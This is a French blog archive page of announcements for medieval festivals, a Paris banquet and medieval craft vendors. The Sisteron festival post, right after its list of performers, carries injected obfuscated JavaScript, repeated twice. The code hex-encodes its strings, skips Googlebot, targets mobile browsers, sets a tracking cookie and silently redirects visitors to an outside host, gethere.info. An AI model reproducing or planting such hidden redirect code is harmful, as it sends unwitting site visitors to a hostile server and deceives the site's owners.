Archive pour la catégorie ‘Professionnels’

Montfort à la Conquête de l’Angleterre

mardi 5 juillet 2016

Dans le cadre du 950ème Anniversaire de la Bataille d’Hastings, Montfort Culture et Patrimoine présente « Montfort à la Conquête de l’Angleterre» les 17 et 18 septembre au Château Médiéval de Montfort sur Risle (Eure)

Samedi soir 17 septembre à 19h00
Diner avec animation musicale médiévale avec le groupe CELESTIAES
Soirée cinéma à 21h00. Diffusion du film « La jeunesse de Guillaume le Conquérant » de Fabien Drugeon. Sur réservation au cout de 2€ la place. Réservations au 02.32.56.35.76 (Office de Tourisme)
Dimanche 18 septembre 2016.
De 9h00 à 19h00, Animations historiques à destination de tous les publics proposées en toute gratuité dans la basse cour du château :
– Campement médiéval de reconstitution historique présentant le mode vie et de nombreuses animations à destination des enfants (adoubement de chevalier, jeux en bois, jeux d’adresse, tir à l’arc)
– Compagnies de combattants Normands Vikings et Saxons proposant des combats en mêlée illustrant La Mesnie d’Hugues de Montfort qui accompagnait Guillaume lors de la bataille d’Hastings
Les combats chorégraphiés de soldats seront accompagnés de chevaliers haranguant les forces ennemies du haut de leurs destriers.
– Joutes équestres A l’issue de la bataille, des joutes à cheval verront s’affronter de nobles chevaliers combattant en lice pour l’honneur d’une gente dame !
– Spectacle «les Fables de Marie de France» .Danses d’inspiration médiévale et marionnettes pour tous âges.
– Conteuse en costume période ducale qui présentera contes et fabliaux à destination des enfants.
– Marché artisanal et produits régionaux, métiers anciens: forge, Maréchal ferrant, Tailleur de pierre
– Montfort Culture et Patrimoine proposera des visites commentées du site et vous contera l’histoire de la dynastie des Montfort et les techniques militaires en usage.
– La maquette du château vous sera présentée autour d’une exposition de toiles relatant la vie de Guillaume
– Le groupe Celestiaes composé de quatre musiciens et accompagné de deux jongleurs vous accompagnera tout au long de la journée et vous apportera joie et bonne humeur.

Buvette / restauration / sanitaires / stationnement
Horaires :
Samedi 17 Septembre de 18h30 à 23h00 (réservation pour la diffusion du film)
Dimanche 18 Septembre de 9h00 à 19h00

Infos : 0232563576 / site web : www.amcp27.fr

Fête Médiévale / Journées du Patrimoine au Château de Montfort sur Risle le 20 septembre

dimanche 28 juin 2015

Dans le cadre des Journées du Patrimoine qui se tiendront le Dimanche 20 septembre prochain, l’association Montfort Culture et Patrimoine vous donne rendez-vous au château médiéval de Montfort sur Risle pour une journée de festivités.

Sur ce site magnifique des XIe et XIIe, inscrit à l’inventaire supplémentaire des monuments historiques, son passé glorieux vous sera conté alors que le vicomte Hugues II de Montfort accompagnait Guillaume le Conquérant lors de la bataille d’Hastings. Un ensemble d’animations à destination de tous les publics vous est proposé en toute gratuité dans la basse cour du château.

– Un campement médiéval normand des XIe et XIIe prendra place au sein de la basse cour.
Les troupes : La Mesnie des Chevaliers de St Georges, les Compagnons pour Hastings et les Klanen Av Byggvir vous présenteront un campement médiéval comme il s’en tenait aux Xe, XI e et XIIe siècles au gré des pérégrinations des châtelains et hommes d’armes.

– La Mesnie des Chevaliers de St Georges composée de quinze personnes présentera un camp médiéval et des activités didactiques et pédagogiques à destination du public.
Hormis les traditionnels présentations de la vie de camp, de l’armement et de la cuisine médiévale, seront proposées des initiations à l’escrime avec du matériel adapté pour les enfants et différents jeux interactifs.
Des machines de siège du XIIe reproduites avec fidélité tel un trébuchet et une baliste seront présentés et des démonstrations de tirs attenants seront proposés en situation.
Les traditionnels combats de soldats chorégraphiés en individuel ou en mêlée prendront place dans la basse cour alors que des joutes à cheval feront s’affronter de nobles chevaliers combattant en lice.

– Le groupe Jàdys deux jeunes femmes et un percussionniste qui interpréteront des chants venus des quatre coins du monde accompagnés d’instruments de musiques tels que guitare-luth et vièle à archet. Chant séfarades médiévaux, orientaux, de l’an mille, le tout soutenu par le tintement des grelots. Ces ménestrels vous feront voyager à travers le temps

– Les Compagnons pour Hastings proposeront divers ateliers d’artisanat parmi lesquels la confection de cottes de mailles, la fabrication de boucliers et la fabrication de l’Hypocras.
Différentes démonstrations de passes d’Armes seront illustrées et le soldat Normand de l’an 1000 sera présenté dans ses différentes composantes.
L’Archerie et les tirs à l’Arbalète feront l’objet de démonstrations à destination du public pour les adultes et les enfants.

– Les Klanen Av Byggvir présenteront une compagnie Viking de Xe et XIe siècles, ancêtres des Normands qui s’établiront dans le Duché dès les Xe. Seront présentés des travaux d’artisanat : forge, textile, broderie. La mythologie nordique sera évoquée alors que le marché aux esclaves ravira les enfants. Les farouches guerriers Vikings équipés de leur armement proposeront des techniques de combats.

– Un marché artisanal complètera les animations et la diversité de produits régionaux ou les confections particulières issues de l’artisanat susciteront l’engouement de la plupart d’entre vous.
Les enfants auront également la possibilité de parcourir le site au gré de ballades à dos d’âne pour leur plus grand plaisir.

– Des vieux métiers seront présentés tel qu’un atelier de vannerie et confection de paniers, un tour de potier et un maréchal ferrant forgeron , Alexandre Fussien, qui présentera pour le plaisir du public des démonstrations de forge et de ferrage de chevaux percherons.

– L’association Montfort Culture et Patrimoine donnera des visites commentées du site et vous contera l’épopée de la dynastie des Montfort ainsi que l’architecture du monument et les techniques de siège en usage au XIe et XIIe.
Nous vous présenterons les travaux de mise en conservation des maçonneries et le sondage archéologique réalisés par l’association Chantier Histoire et Architecture Médiévale lors des trois dernières campagnes et vous informerons des différents projets attenants dès l’année prochaine.

– La Maquette du château médiéval, réplique effectuée scrupuleusement d’après les plans et recherches archéologiques sera présentée et expliquée au public par Gilles Mauger qui évoquera par ailleurs le mode de construction des édifices militaires et religieux de style roman.

Soucieux de vous accueillir dans les meilleures conditions, une buvette et une petite restauration à base de crêpes complètes ou sucrées vous seront proposées afin de passer la journée en famille. Les sanitaires et le stationnement de votre véhicule à proximité du site complèteront le confort de votre accueil en toute gratuité lors de cette journée.

Horaires : Dimanche 20 Septembre de 9h00 à 19h00

Informations au : 0685618379 ou 0232563576 / site web : www.amcp27.fr

médiévales Montfort

médiévales Montfort

médiévales Montfort

médiévales Montfort

Festival médiéval « Le passage du fort »

mardi 29 juillet 2014

Festival médiéval

Les 23 et 24 août offrez-vous un passage dans le temps à Sisteron.Venez découvrir en famille et en costume médiéval la 5ème édition du Passage du fort. La ville, la Citadelle, les commerçants, les vitrines sont aux couleurs du moyen âge.

Les restaurateurs vous proposent des menus médiévaux

Pour ouvrir ce festival, du 19 au 23 août une exposition dans le hall de la mairie. Jean-Luc CHARRIGNON atelier « le Bois et le fer proposera une animation sur la forge au moyen âge.
Cette exposition présentera la serrurerie, l’art de la table, la fabrication de pointes de flèches au XIIème siècle (entrée gratuite – 10 à 19h00)

Deux journées de fête : le samedi 23 dans la ville et dimanche 24 dans la Citadelle.
L’animation est permanente. Saltimbanques, échassiers, cracheur de feu, fabliaux, musiques, contes… Artisanat, et métiers disparus : haubergier, enlumineur, forgeron. Un saintier réalisera les étapes de fabrication d’une cloche (troussage du moule, coulée et démoulage du battant). Explications sur l’art campanaire au public.
Concert et présentation d’instruments de musique à la cathédrale le samedi
Cavalcades Spectacle de feu Bal médiéval
Passage dans le temps pour la durée d’un week-end, dames et chevaliers, troubadours et hommes d’armes feront tout pour vous divertir
Manifestation «labellisée Qualité» par la Fédération Française des Fêtes et Spectacles Historiques à laquelle nous adhérons depuis 2000. Une Démarche Qualité dans laquelle nous sommes engagés depuis 2006. Ce label récompense les efforts de l’association, qui portent à la fois sur la mesure de la satisfaction des visiteurs de la fête et sur la sensibilisation aux bonnes pratiques des bénévoles de la fête au travers de la signature d’une charte.

Entré concert (samedi 23)
Moins de 12 ans : Gratuit
Groupes (+de 10Pers) & adhérents F.F.F.S.H : 8E
Adultes : 10E

Entré Citadelle (dimanche 24)
Moins de 8ans : Gratuit
Jusqu’à 16 ans : 6E
Groupes (+de 10 Pers.) & adhérents F.F.F.S.H & Personnes costumées: 8E
Adultes : 10E
Accès (gratuit) handicapés moteur, uniquement sur deuxième et troisième terrasse. Accompagnateurs prendre contact à l’accueil.

 

Les intervenants de cette belle fête :
Les Goliards de Provence, Animals & Co, Marymorgan WITCH et l’Ordres des corbeaux, Jean-Luc Charrignon atelier « Le bois et le fer », Cie les Vaguabondes, Le Prince des Dombes, Stéphane HUGUET dit « Sanguin le Heaumier », Les cavaliers des Dunes, Association La Terra de Miramaris, Association Théâtre en liberté, Les Gueux de Volonne, Association L’Ost des temps Jadis, Association L’Ost de Roy, Association la Geste des Terres Hautes, Eric Klee Atelier de sculptures et de fonderie  L’Esquielle, Association Entre Deux Airs Les BMS, VOLPES Patrick, Chloé ALLvar _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Participez au premier banquet médiéval de Paris!

lundi 23 juillet 2012

Vous rêviez de découvrir la gastronomie médiévale au son des troubadours et du claquement des verres sur les tables?  L’Echoppe médiévale, Medievents.fr, Passion médiévale s’associent pour vous offrir un véritable bond dans le temps de près de sept siècles.

Rejoignez-nous pour festoyer comme des rois le vendredi 7 septembre 2012 à partir de 20 H!

Vous serez accueilli par les échansons aux portes du restaurant  Aux Ecuries du Roy qui se trouve 8 rue Bachaumont, 75002 Paris (Métro les Halles / Etienne Marcel ; Parking : les Halles).

Une fois descendu, vous profiterez d‘un cadre splendide et authentique que vous mangiez dans la grande salle ou le salon templier attenant.

Nous emmènerons vos papilles à la découverte des saveurs anciennes, épicées et savoureuses grâce à une variété de plats issus des traités culinaires médiévaux ( Mesnagier de Paris, Viandier de Taillevent…) préparé par les maitres queux du restaurant Aux écuries du Roy.

Le menu se décomposera en quatre temps qui vous permettront de goûter différents plats sans saturer : le premier met, le second met,  la desserte, l’ issue. Vous découvrirez ainsi des recettes telles que les rissoles, la porée, le poulet au verjus ou le civé de connin… recettes dont la cuisine traditionnelle française actuelle est toujours l’héritière.

Pour finir,  nous vous proposerons un véritable extra :  le boute-hors composé de petites sucreries et de fruits épicés au miel qui favoriseront votre digestion. L’hypocras coulera bien sûr à flot.

Évidemment, point de banquet sans entremets pour vous divertir : ces intermèdes artistiques vous permettront le temps d’un instant de lever le nez de vos tranchoirs et de vous laissez porter par les chanteurs à l’unisson du Choeur Montgeois Saint-Denis ou les troubadours du Quatuor de la Tour des Miracles. Jehan le magicien accompagnera votre repas de quelques facéties, ainsi que le fou du roi, messire Philippe Colo.

Une fois le repas terminé, nous danserons jusqu’à 2H du matin et tout sera mis en œuvre pour vous faire passer une soirée inoubliable par nos saltimbanques.

Notez bien :

La réservation est obligatoire car le nombre de place est limité. Aucun paiement sur place ne sera accepté.

Le paiement s’effectue en ligne, sur le site de l’Echoppe médiévale.Les places sont à commander dans le panier à cette adresse.

http://www.echoppemedievale.com/banquet_medieval/2726-2-1-c.html

Le costume est obligatoire pour accéder à l’événement. La location est possible auprès de l’ Echoppe médiévale )

Tarifs :

Entrée adulte : 49€

Entrée enfant moins de 10 ans : 19€

Informations :

En boutique, à l’Echoppe médiévale au 10 rue Friant 75 014 Paris, aux jours et horaires d’ouverture

par mail : contact@echoppemedievale.com

par téléphone au : +33 (0)1 45 49 12 71

Photographe Freelance: photos médiévales

samedi 5 mai 2012

Photographe Freelance: spécialiste des fêtes médiévales et des photos médiévales
bonjour à toutes et tous.
Nous nous sommes peut-etre rencontres lors de l’une de vos prestation ou j’ai eu le plaisir de faire des photos de votre compagnies.
J’ai le plaisir de vous annoncer la creation de mon auto-entreprise vous pouvez voir mon travail sur mon site :
http://photosspectacles.free.fr

Je reste a votre disposition pour plus de renseignements mail : boph01@free.fr

L’histoire des cordes et lanières de cuir

samedi 17 mars 2012

Tout le monde sait ce que la corde est, mais tout le monde ne sait pas comment une  corde est faite ou de quels types de fibres, elle est fabriquée. Et très peu connaisse sans doute l’histoire de la fabrication de cordes, ou comment elle s’est développée à partir du simple fil au câble grande qui amarre désormais les navires géants à leurs quais ou les aides pour les ancrer dans les tempêtes océaniques. Laissez-nous revenir en arrière et essayer de retracer l’histoire de la corde.

Il s’agit d’une longue histoire dans le lointain passé. Dans des temps très anciens les hommes doivent avoir utilisé certains types de cordons ou de lignes pour la pêche, pour attacher les animaux Ceux-ci peuvent avoir été des lanières de cuir, du bois souple, des racines fibreuses, et ces dons de la nature, et dans tous les temps qu’ elles ont été torsadés et tréssées ensemble pour former un cordon plus long et plus fort ou de la corde. Nous avons des preuves de cela. Tribus de sauvages encore en cordes utilisation faites de divers matériaux et certains d’entre eux très bien fait. Celles-ci ont été en usage parmi eux pendant de longs siècles.

Prenons le cas des anciennes tribus indiennes. Ils longtemps fait usage de cordages torsadés à partir de coton et autres fibres, ou formés à partir de l’écorce interne des différents arbres et les racines des autres et de poils, ainsi que des peaux et nerfs et tendons des animaux.

La bonne corde a été faite également par les anciens Péruviens, par les Islandais de la mer du Sud, et par les indigènes de nombreuses autres régions. Ceux qui sont sur le bord de mer on fait des lignes de pêche et bien formés des filets, et certaines tribus, parmi eux les Indiens Nootka, harponnait la baleine, en utilisant des cordons fabriqués à partir des tendons de l’animal, flexibles et étant très forte résistance.

La boutique d’accessoires médiévaux

mercredi 22 février 2012

Découvrez la boutique en ligne de pièces et d’accessoires médiévaux sur Paris.

Site : le-marquis.fr

Bonjour a toutes et tous.
Je suis artisan d’art a Paris dans la réalisation et la fabrication de pièces et d’accessoires médiévaux.
En plus de mon atelier qui se trouve au 26 rue Georges Pitard dans le 15e.
J’ai un site en partenariat avec ebay ou vous trouverez un large choix J’ ajoute régulièrement de nouvelles créations au grès de mes fabrications Je vous souhaite une bonne visite et je vous dis a bientot sur un marché médiéval ou a l’atelier cordialement

LM

SPECTACLE LA LEGENDE DE MERLIN

dimanche 8 janvier 2012

BONJOUR
LES PHOTOS DU SPECTACLE LA LEGENDE DE MERLIN AU STADE COUVERT DE LIEVIN
SONT SUR MON SITE
photosspectacles.free.fr

MEDIEVALES 2011

samedi 19 novembre 2011

LES PHOTOS DES MEDIEVALES 2011 DE BARLIN . BELLLAING . CONDE SUR ESCAUT . MONTIGNY EN OSTREVENT .
MAING . SONT SUR MON SITE ET D’AUTRES LE SERONT BIENTOT
photosspectacles.free.fr

Boutique médiévale: lueur médiévale

dimanche 16 octobre 2011

Visiteurs, Gentes Dames et Nobles Sires découvrez lueur-medievale.com !

Vous trouverez dans notre Echoppe des Vêtements Médiévaux, des Armes Médiévales, et beaucoup d’autres Accessoires Médiévaux. Tous nos Articles sont conçus dans des Matières de Qualité et proposés malgré tout à des prix justes et attractifs. Enfin, nous ajoutons régulièrement sur le site de nouveaux articles que nous souhaitons Authentiques et Originaux. Franchissez donc régulièrement le seuil de notre porte, nous espérons vous étonner !

La boutique médiévale: lueur-medievale.com
Plus de détail et toutes notre gamme de produits sur : www.lueur-medievale.com.

  • N’hésitez pas à joindre notre Service-Clients au : 03 86 22 48 64 ou au 07 86 52 09 77 du Mardi au Samedi de 10h à 19h.(Enregistrez votre message en cas d’indisponibilité et vous serez rappelé très vite.)
  • Vous pouvez aussi poser vos Questions sur: infos@lueur-medievale.com